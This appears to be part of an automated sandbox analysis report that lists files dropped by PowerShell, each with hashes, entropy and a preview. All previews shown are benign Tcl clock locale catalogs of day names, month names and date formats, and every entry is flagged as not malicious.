                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_SY DAYS_OF_WEEK_ABBREV [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar_SY MONTHS_ABBREV [list \.. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\.. "\u0634\u0628\u0627\u0637"\.. "\u0622\u0630\u0627\u0631"\.. "\u0646\u064a\u0633\u0627\u0646"\.. "\u0646\u0648\u0627\u0631"\.. "\u062d\u0632\u064a\u0631\u0627\u0646"\.. "\u062a\u0645\u0648\u0632"\.. "\u0622\u0628"\.. "\u0623\u064a\u0644\u0648\u0644"\.. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u064
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2157
                                                                                                                                                                                                                              Entropy (8bit):4.27810535662921
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:43PI8IKQGQ8mA/XxQJxQnA9QJlPyI/tbCaQICMIcQ8InVI5tNIzQFIQQLtChjsI4:2PItK5BSb9ajfycCW5IzdQNxK
                                                                                                                                                                                                                              MD5:6334BDDFC1E0EAE4DBB2C90F85818FD8
                                                                                                                                                                                                                              SHA1:085EDC3D027D6B5A6A6A2561717EA89C8F8B8B39
                                                                                                                                                                                                                              SHA-256:A636A82C7D00CCDC0AF2496043FFA320F17B0D48A1232708810D3BB1453E881E
                                                                                                                                                                                                                              SHA-512:18ADB77314FCFD534E55B234B3A53A0BC572AB60B80D099D2F3B20E0C5FE66179FDC076AA43200DB3CA123BC6216989EC41448FA624D3BA9633413AD8AD6034C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset be DAYS_OF_WEEK_ABBREV [list \.. "\u043d\u0434"\.. "\u043f\u043d"\.. "\u0430\u0442"\.. "\u0441\u0440"\.. "\u0447\u0446"\.. "\u043f\u0442"\.. "\u0441\u0431"].. ::msgcat::mcset be DAYS_OF_WEEK_FULL [list \.. "\u043d\u044f\u0434\u0437\u0435\u043b\u044f"\.. "\u043f\u0430\u043d\u044f\u0434\u0437\u0435\u043b\u0430\u043a"\.. "\u0430\u045e\u0442\u043e\u0440\u0430\u043a"\.. "\u0441\u0435\u0440\u0430\u0434\u0430"\.. "\u0447\u0430\u0446\u0432\u0435\u0440"\.. "\u043f\u044f\u0442\u043d\u0456\u0446\u0430"\.. "\u0441\u0443\u0431\u043e\u0442\u0430"].. ::msgcat::mcset be MONTHS_ABBREV [list \.. "\u0441\u0442\u0434"\.. "\u043b\u044e\u0442"\.. "\u0441\u043a\u0432"\.. "\u043a\u0440\u0441"\.. "\u043c\u0430\u0439"\.. "\u0447\u0440\u0432"\.. "\u043b\u043f\u043d"
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1871
                                                                                                                                                                                                                              Entropy (8bit):4.4251657008559935
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:43EUAIlnQf/QVdQ81mnEZqEavWQEQ3QvQrQL0QjQTtQDCQSY4tqP:27xMk+nEZqE3biIYbUi+C9y
                                                                                                                                                                                                                              MD5:E5225D6478C60E2502D18698BB917677
                                                                                                                                                                                                                              SHA1:52D611CB5351FB873D2535246B3A3C1A37094023
                                                                                                                                                                                                                              SHA-256:CFE4E44A3A751F113847667EC9EA741E762BBDE0D4284822CB337DF0F92C1ACA
                                                                                                                                                                                                                              SHA-512:59AB167177101088057BF4EE0F70262987A2177ECB72C613CCAAE2F3E8D8B77F07D15DA5BE3B8728E23C31A1C9736030AA4036A8CD00A24791751A298B3A88B3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset bg DAYS_OF_WEEK_ABBREV [list \.. "\u041d\u0434"\.. "\u041f\u043d"\.. "\u0412\u0442"\.. "\u0421\u0440"\.. "\u0427\u0442"\.. "\u041f\u0442"\.. "\u0421\u0431"].. ::msgcat::mcset bg DAYS_OF_WEEK_FULL [list \.. "\u041d\u0435\u0434\u0435\u043b\u044f"\.. "\u041f\u043e\u043d\u0435\u0434\u0435\u043b\u043d\u0438\u043a"\.. "\u0412\u0442\u043e\u0440\u043d\u0438\u043a"\.. "\u0421\u0440\u044f\u0434\u0430"\.. "\u0427\u0435\u0442\u0432\u044a\u0440\u0442\u044a\u043a"\.. "\u041f\u0435\u0442\u044a\u043a"\.. "\u0421\u044a\u0431\u043e\u0442\u0430"].. ::msgcat::mcset bg MONTHS_ABBREV [list \.. "I"\.. "II"\.. "III"\.. "IV"\.. "V"\.. "VI"\.. "VII"\.. "VIII"\.. "IX"\.. "X"\.. "XI"\.. "XII"\.. ""].. ::msgcat::mcset bg MO
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2335
                                                                                                                                                                                                                              Entropy (8bit):4.107102006297273
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR835e/MWrD//6HFEVcVVcCVcTUTVckVEVcT7VcEEVcby/Vcn0VcMr/0VcM8VcQ:43ktX++QalMObalMZ6IE6V
                                                                                                                                                                                                                              MD5:5D25E7FC65824AC987535FEA14A4045C
                                                                                                                                                                                                                              SHA1:85C10F05823CD3263FC7B3EC38796BEC261B3716
                                                                                                                                                                                                                              SHA-256:890EA6521DEB1B3C3913CCD92562F6360E064DAEE2E2B0356A6DD97A46264A1F
                                                                                                                                                                                                                              SHA-512:5D8A88ACAEBBF3CD721F288FA0F1FEE517EE568CA5482E30CFA1E36CD37DF011C449090E2D9041F1D046A191F13D4C5C4B6F9E2F16FD259E63CE46ECC4E4F81F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset bn DAYS_OF_WEEK_ABBREV [list \.. "\u09b0\u09ac\u09bf"\.. "\u09b8\u09cb\u09ae"\.. "\u09ae\u0999\u0997\u09b2"\.. "\u09ac\u09c1\u09a7"\.. "\u09ac\u09c3\u09b9\u09b8\u09cd\u09aa\u09a4\u09bf"\.. "\u09b6\u09c1\u0995\u09cd\u09b0"\.. "\u09b6\u09a8\u09bf"].. ::msgcat::mcset bn DAYS_OF_WEEK_FULL [list \.. "\u09b0\u09ac\u09bf\u09ac\u09be\u09b0"\.. "\u09b8\u09cb\u09ae\u09ac\u09be\u09b0"\.. "\u09ae\u0999\u0997\u09b2\u09ac\u09be\u09b0"\.. "\u09ac\u09c1\u09a7\u09ac\u09be\u09b0"\.. "\u09ac\u09c3\u09b9\u09b8\u09cd\u09aa\u09a4\u09bf\u09ac\u09be\u09b0"\.. "\u09b6\u09c1\u0995\u09cd\u09b0\u09ac\u09be\u09b0"\.. "\u09b6\u09a8\u09bf\u09ac\u09be\u09b0"].. ::msgcat::mcset bn MONTHS_ABBREV [list \.. "\u099c\u09be\u09a8\u09c1\u09df\u09be\u09b0\u09c0"\.. "\u09ab\u09c7\u09ac\u09cd\u09b0\u09c1\u09df\u09be
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):265
                                                                                                                                                                                                                              Entropy (8bit):4.868201122972066
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xovtvfluo/E3v6xyFjovto+3vflm68vn:4EnLB383UtvfltE3v6g8tF3vflm6+n
                                                                                                                                                                                                                              MD5:B91BB2ABC23B90962D2070B9588F2AB5
                                                                                                                                                                                                                              SHA1:CBB4E9CD600773792C6E9F3E6B27E99C1846B44F
                                                                                                                                                                                                                              SHA-256:B3D8A4632290B0F3DA690E47C1FDF06A8B9E171A96E938AFDB0DD52CF806CE54
                                                                                                                                                                                                                              SHA-512:932FC4B8C3CA72731187D56012AD7DD7777C4D447F16EEB17B9D68235C9590DF99992FD22B8D7C85A843A610F93CD36FAFA993C34C441255A1C0A93C73BC5FE4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset bn_IN DATE_FORMAT "%A %d %b %Y".. ::msgcat::mcset bn_IN TIME_FORMAT_12 "%I:%M:%S %z".. ::msgcat::mcset bn_IN DATE_TIME_FORMAT "%A %d %b %Y %I:%M:%S %z %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1152
                                                                                                                                                                                                                              Entropy (8bit):4.2880653012847985
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83FMVBNfPg+g+RjMu5+C6MB4zdiwvWvn:432g6jh65zd3gn
                                                                                                                                                                                                                              MD5:72DDD60C907DD235BCE4AB0A5AEE902C
                                                                                                                                                                                                                              SHA1:06150F793251687E6FBC3FDA3BC81BCBFC7DE763
                                                                                                                                                                                                                              SHA-256:3BE295DCC8FCDC767FED0C68E3867359C18E7E57D7DB6C07236B5BC572AD328E
                                                                                                                                                                                                                              SHA-512:3B0A85003692F1E46185D5CC09236D2DA5E6D29166C9812D07A7D6BF6AC6C3B0708F91C6899768D4DBA3528081B8B43E09F49622B70F1CF991AFAC5352B6BA37
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ca DAYS_OF_WEEK_ABBREV [list \.. "dg."\.. "dl."\.. "dt."\.. "dc."\.. "dj."\.. "dv."\.. "ds."].. ::msgcat::mcset ca DAYS_OF_WEEK_FULL [list \.. "diumenge"\.. "dilluns"\.. "dimarts"\.. "dimecres"\.. "dijous"\.. "divendres"\.. "dissabte"].. ::msgcat::mcset ca MONTHS_ABBREV [list \.. "gen."\.. "feb."\.. "mar\u00e7"\.. "abr."\.. "maig"\.. "juny"\.. "jul."\.. "ag."\.. "set."\.. "oct."\.. "nov."\.. "des."\.. ""].. ::msgcat::mcset ca MONTHS_FULL [list \.. "gener"\.. "febrer"\.. "mar\u00e7"\.. "abril"\.. "maig"\.. "juny"\.. "juliol"\.. "agost"\.. "setembre"\.. "octubre"\.. "novembre"\.. "desembre"\.. ""].. ::msg
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1354
                                                                                                                                                                                                                              Entropy (8bit):4.466447248030554
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83U4nZ4yJTkkG3mYWEZqO1R3DNBEVG+PYhxrU4UF3ecCvt7/v3e6:43TJTGmnEZqE5/EVEDOGtDp
                                                                                                                                                                                                                              MD5:F32EAD82CC26754C5A8E092873A28DB3
                                                                                                                                                                                                                              SHA1:325124660F62242B24623B4B737CB4616F86CFF3
                                                                                                                                                                                                                              SHA-256:AFEA12A16A6FA750EA610245133B90F178BA714848F89AEC37429A3E7B06BE1A
                                                                                                                                                                                                                              SHA-512:04E335AAFBF4D169983635FC87BCFFE86FBA570A3E1820D20240EF7B47E7A3CD94AE3598543DCE92A1F82B5146CAAD982EFE9490EFD9E581D58515CFC3930581
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset cs DAYS_OF_WEEK_ABBREV [list \.. "Ne"\.. "Po"\.. "\u00dat"\.. "St"\.. "\u010ct"\.. "P\u00e1"\.. "So"].. ::msgcat::mcset cs DAYS_OF_WEEK_FULL [list \.. "Ned\u011ble"\.. "Pond\u011bl\u00ed"\.. "\u00dater\u00fd"\.. "St\u0159eda"\.. "\u010ctvrtek"\.. "P\u00e1tek"\.. "Sobota"].. ::msgcat::mcset cs MONTHS_ABBREV [list \.. "I"\.. "II"\.. "III"\.. "IV"\.. "V"\.. "VI"\.. "VII"\.. "VIII"\.. "IX"\.. "X"\.. "XI"\.. "XII"\.. ""].. ::msgcat::mcset cs MONTHS_FULL [list \.. "leden"\.. "\u00fanor"\.. "b\u0159ezen"\.. "duben"\.. "kv\u011bten"\.. "\u010derven"\.. "\u010dervenec"\.. "srpen"\.. "z\u00e1\u0159\u00ed"\.. "\u0159\u00edjen"\..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1208
                                                                                                                                                                                                                              Entropy (8bit):4.315504392809956
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83wV0tBVYuorIsmZ5meAxyISjTHU92WFVwpwvbvT:43w+DiuorreAY0zw8rT
                                                                                                                                                                                                                              MD5:27A6A8BE8903AEF9D0BE956906A89583
                                                                                                                                                                                                                              SHA1:EE29FDF67CB3AE150DF6BBBE603C1C3F5DA28641
                                                                                                                                                                                                                              SHA-256:0D422A991BCA13FE9033118691CFEDAB0F372222EBB0BC92BAF8E914EE816B84
                                                                                                                                                                                                                              SHA-512:0E702A679AD94BF479226B7DE32077562F3F95210F6453AE564138386DBB179941BA5359AEE9AC532F4A6E5BE745D6962D6B638A21DD48B865716F2FD2A0CB01
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset da DAYS_OF_WEEK_ABBREV [list \.. "s\u00f8"\.. "ma"\.. "ti"\.. "on"\.. "to"\.. "fr"\.. "l\u00f8"].. ::msgcat::mcset da DAYS_OF_WEEK_FULL [list \.. "s\u00f8ndag"\.. "mandag"\.. "tirsdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "l\u00f8rdag"].. ::msgcat::mcset da MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset da MONTHS_FULL [list \.. "januar"\.. "februar"\.. "marts"\.. "april"\.. "maj"\.. "juni"\.. "juli"\.. "august"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat::mcset da B
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1276
                                                                                                                                                                                                                              Entropy (8bit):4.349293509679722
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83cFNSsZKKgXum47fpK2OaSIui7dHqWZ0ZIBFJWJvvvWIn:43InZKKgXoOqx1W67W9XWIn
                                                                                                                                                                                                                              MD5:EE3963A5F7E29C05C9617BE3FD897114
                                                                                                                                                                                                                              SHA1:0F978CA174DF596817F872B5EF1B447B9DFE651C
                                                                                                                                                                                                                              SHA-256:4C27733502066E8391654D1D372F92BF0484C5A3821E121AE8AA5B99378C99AE
                                                                                                                                                                                                                              SHA-512:EA933709C68F8199858A1CC1FFDA67EE7458CC57A163E672535EB0B4C37BFDC200604C7506748DAC3158B6CA63C2F076A2C6252B2A596E59F83D3B1D4BC9C901
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset de DAYS_OF_WEEK_ABBREV [list \.. "So"\.. "Mo"\.. "Di"\.. "Mi"\.. "Do"\.. "Fr"\.. "Sa"].. ::msgcat::mcset de DAYS_OF_WEEK_FULL [list \.. "Sonntag"\.. "Montag"\.. "Dienstag"\.. "Mittwoch"\.. "Donnerstag"\.. "Freitag"\.. "Samstag"].. ::msgcat::mcset de MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mrz"\.. "Apr"\.. "Mai"\.. "Jun"\.. "Jul"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dez"\.. ""].. ::msgcat::mcset de MONTHS_FULL [list \.. "Januar"\.. "Februar"\.. "M\u00e4rz"\.. "April"\.. "Mai"\.. "Juni"\.. "Juli"\.. "August"\.. "September"\.. "Oktober"\.. "November"\.. "Dezember"\.. ""].. ::msgcat::mcset de BCE "v.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):847
                                                                                                                                                                                                                              Entropy (8bit):4.412930056658995
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR831sMm47fpK2++SIui7dHqWZ0ZItovGvzvW:431h+mx1Wm+QjW
                                                                                                                                                                                                                              MD5:A6227CD4F7434952D093F1F3C64B4378
                                                                                                                                                                                                                              SHA1:0DDB9A49CB83DDF2396B2ECA85093260710496C2
                                                                                                                                                                                                                              SHA-256:1C02D14140196623297F858E2EEF00B4159E1C6FAFE044EC65A48C9C24D46540
                                                                                                                                                                                                                              SHA-512:D63F34024356F5CE0335D14EA557F4BBF238CCA8265DD27C039C70F7F28FE737F368B030DEE10B2C536512D2815E1F5B19838D08745C6A76A39050D573597EB3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset de_AT MONTHS_ABBREV [list \.. "J\u00e4n"\.. "Feb"\.. "M\u00e4r"\.. "Apr"\.. "Mai"\.. "Jun"\.. "Jul"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dez"\.. ""].. ::msgcat::mcset de_AT MONTHS_FULL [list \.. "J\u00e4nner"\.. "Februar"\.. "M\u00e4rz"\.. "April"\.. "Mai"\.. "Juni"\.. "Juli"\.. "August"\.. "September"\.. "Oktober"\.. "November"\.. "Dezember"\.. ""].. ::msgcat::mcset de_AT DATE_FORMAT "%Y-%m-%d".. ::msgcat::mcset de_AT TIME_FORMAT "%T".. ::msgcat::mcset de_AT TIME_FORMAT_12 "%T".. ::msgcat::mcset de_AT DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1276
                                                                                                                                                                                                                              Entropy (8bit):4.389082225723362
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83B8VSysVB8VsZKKgJ5Mm47fpK26aSIui7dHqWZ0ZIlj5VevjevbDvW:43Bt1VBbZKKgJs6qx1Wc5VojobzW
                                                                                                                                                                                                                              MD5:C351057D8E5328C0790901D1F4DBEC9F
                                                                                                                                                                                                                              SHA1:F73DE8AEF7F8083B0726760AA003E81067A68588
                                                                                                                                                                                                                              SHA-256:532845CD15EC821C1939D000C648694A64E8CA8F0C14BAD5D79682CF991481CE
                                                                                                                                                                                                                              SHA-512:8152AD082D0A6A4EBE7E1CCA9D4A5F2E48ABE3F09F4385A517C523A67CA3B08E0F20C193D0F6850F37E55ED0CD6FBD201FE22CC824AF170976D04DB061212F2D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset de_BE DAYS_OF_WEEK_ABBREV [list \.. "Son"\.. "Mon"\.. "Die"\.. "Mit"\.. "Don"\.. "Fre"\.. "Sam"].. ::msgcat::mcset de_BE DAYS_OF_WEEK_FULL [list \.. "Sonntag"\.. "Montag"\.. "Dienstag"\.. "Mittwoch"\.. "Donnerstag"\.. "Freitag"\.. "Samstag"].. ::msgcat::mcset de_BE MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "M\u00e4r"\.. "Apr"\.. "Mai"\.. "Jun"\.. "Jul"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dez"\.. ""].. ::msgcat::mcset de_BE MONTHS_FULL [list \.. "Januar"\.. "Februar"\.. "M\u00e4rz"\.. "April"\.. "Mai"\.. "Juni"\.. "Juli"\.. "August"\.. "September"\.. "Oktober"\.. "November"\.. "Dezember"\.. ""].. ::m
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2304
                                                                                                                                                                                                                              Entropy (8bit):4.371322909589862
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR833v+ZYYWtv+nWfFyL1NYOg+EKVJQ19tWQYmYaYRn9sWuSAJIJ6eRa6WrmdlX:43/pZyLjY0uYR9QmdkjC9r
                                                                                                                                                                                                                              MD5:7DD14B1F4FF532DCAF6D4C6F0DF82E9A
                                                                                                                                                                                                                              SHA1:707875FEF4207EBB71D066FDC54C7F68560C6DAD
                                                                                                                                                                                                                              SHA-256:8B23E0E2F0F319BB9A2DFDCCDC565FF79A62FA85094811189B6BC41594232B6B
                                                                                                                                                                                                                              SHA-512:5ECA072DE5DD7890270AE268C7C8D40EE2DB6966643604D16E54194DB0AD74FDA8D04848331E61B387E8B494AF18252E38671D939069EC4C90C672A629563B88
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset el DAYS_OF_WEEK_ABBREV [list \.. "\u039a\u03c5\u03c1"\.. "\u0394\u03b5\u03c5"\.. "\u03a4\u03c1\u03b9"\.. "\u03a4\u03b5\u03c4"\.. "\u03a0\u03b5\u03bc"\.. "\u03a0\u03b1\u03c1"\.. "\u03a3\u03b1\u03b2"].. ::msgcat::mcset el DAYS_OF_WEEK_FULL [list \.. "\u039a\u03c5\u03c1\u03b9\u03b1\u03ba\u03ae"\.. "\u0394\u03b5\u03c5\u03c4\u03ad\u03c1\u03b1"\.. "\u03a4\u03c1\u03af\u03c4\u03b7"\.. "\u03a4\u03b5\u03c4\u03ac\u03c1\u03c4\u03b7"\.. "\u03a0\u03ad\u03bc\u03c0\u03c4\u03b7"\.. "\u03a0\u03b1\u03c1\u03b1\u03c3\u03ba\u03b5\u03c5\u03ae"\.. "\u03a3\u03ac\u03b2\u03b2\u03b1\u03c4\u03bf"].. ::msgcat::mcset el MONTHS_ABBREV [list \.. "\u0399\u03b1\u03bd"\.. "\u03a6\u03b5\u03b2"\.. "\u039c\u03b1\u03c1"\.. "\u0391\u03c0\u03c1"\.. "\u039c\u03b1\u03ca"\.. "\u0399\u03bf\u
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):307
                                                                                                                                                                                                                              Entropy (8bit):4.896073290907262
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoCwmGjbmvFjoCws6W3v1oCws6W3v6p6HyFjoCwmT+3vjbe:4EnLB383QrmdSs6W3vss6W3v6QSoJ3ve
                                                                                                                                                                                                                              MD5:5B31AD8AC0000B01C4BD04BF6FC4784C
                                                                                                                                                                                                                              SHA1:F55145B473DDCAE38A0F7297D58B80B12B2A5271
                                                                                                                                                                                                                              SHA-256:705C66C14B6DE682EC7408EABDBA0800C626629E64458971BC8A4CBD3D5DB111
                                                                                                                                                                                                                              SHA-512:1CCE6BCAE5D1F7D80E10687F0BCA2AE1B2DD53F04A0F443DC9B552804D60E708E64326B62BA4E3787325D89837B4AC8CCCA9AF6F39CBD654BCC8A9C27EA63BB8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_AU DATE_FORMAT "%e/%m/%Y".. ::msgcat::mcset en_AU TIME_FORMAT "%H:%M:%S".. ::msgcat::mcset en_AU TIME_FORMAT_12 "%I:%M:%S %P %z".. ::msgcat::mcset en_AU DATE_TIME_FORMAT "%e/%m/%Y %H:%M:%S %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):312
                                                                                                                                                                                                                              Entropy (8bit):4.870560620756039
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoCr3FuoCsX3vtfNrsoCsX3v6YNIdjoCs+3v3FnN9vn:4EnLB383H3Fb3vtNN3v6y43v3FnNNn
                                                                                                                                                                                                                              MD5:DDA87ACED97F9F7771788A1A0A1E4433
                                                                                                                                                                                                                              SHA1:E221653CD659C095098180344654770FF059331B
                                                                                                                                                                                                                              SHA-256:BC87754A253C1036E423FA553DA182DBC56F62A13EDA811D8CD9E8AFA40404A6
                                                                                                                                                                                                                              SHA-512:BB95D9241B05686CA15C413746DD06071635CB070F38847BE9702397A86C01A3D54DEBE1ACAA51834AB74DB8D0F75E353995183864E382721425756EE46B0B1E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_BE DATE_FORMAT "%d %b %Y".. ::msgcat::mcset en_BE TIME_FORMAT "%k:%M:%S".. ::msgcat::mcset en_BE TIME_FORMAT_12 "%k h %M min %S s %z".. ::msgcat::mcset en_BE DATE_TIME_FORMAT "%d %b %Y %k:%M:%S %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.915769170926952
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xosmGMoss6W3v6ay/5osmT+3vR6HyFvn:4EnLB383hr8s6W3v6ay/hJ3voSVn
                                                                                                                                                                                                                              MD5:4CBF90CE15ECCB6B695AA78D7D659454
                                                                                                                                                                                                                              SHA1:30C26ADB03978C5E7288B964A14B692813D6E0B8
                                                                                                                                                                                                                              SHA-256:EC48F18995D46F82B1CC71EA285174505A50E3BA2017BCCE2D807149B7543FD0
                                                                                                                                                                                                                              SHA-512:CC809EBD1B2B5D9E918C2E2CE4E7075DFB0744C583F17C1C234D8437EF0C34654D2F09FF77544AD3430CEC78ABC70AA5F85F71AD1489A687B8087FCDFE07B088
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_BW DATE_FORMAT "%d %B %Y".. ::msgcat::mcset en_BW TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset en_BW DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):295
                                                                                                                                                                                                                              Entropy (8bit):4.87629705076992
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoAhgqyFjoAZF3vX5oAZF3v6cvBoAh9+3vnFDL8vn:4EnLB383FhgqWDZF3vVZF3v6cvdhI3vM
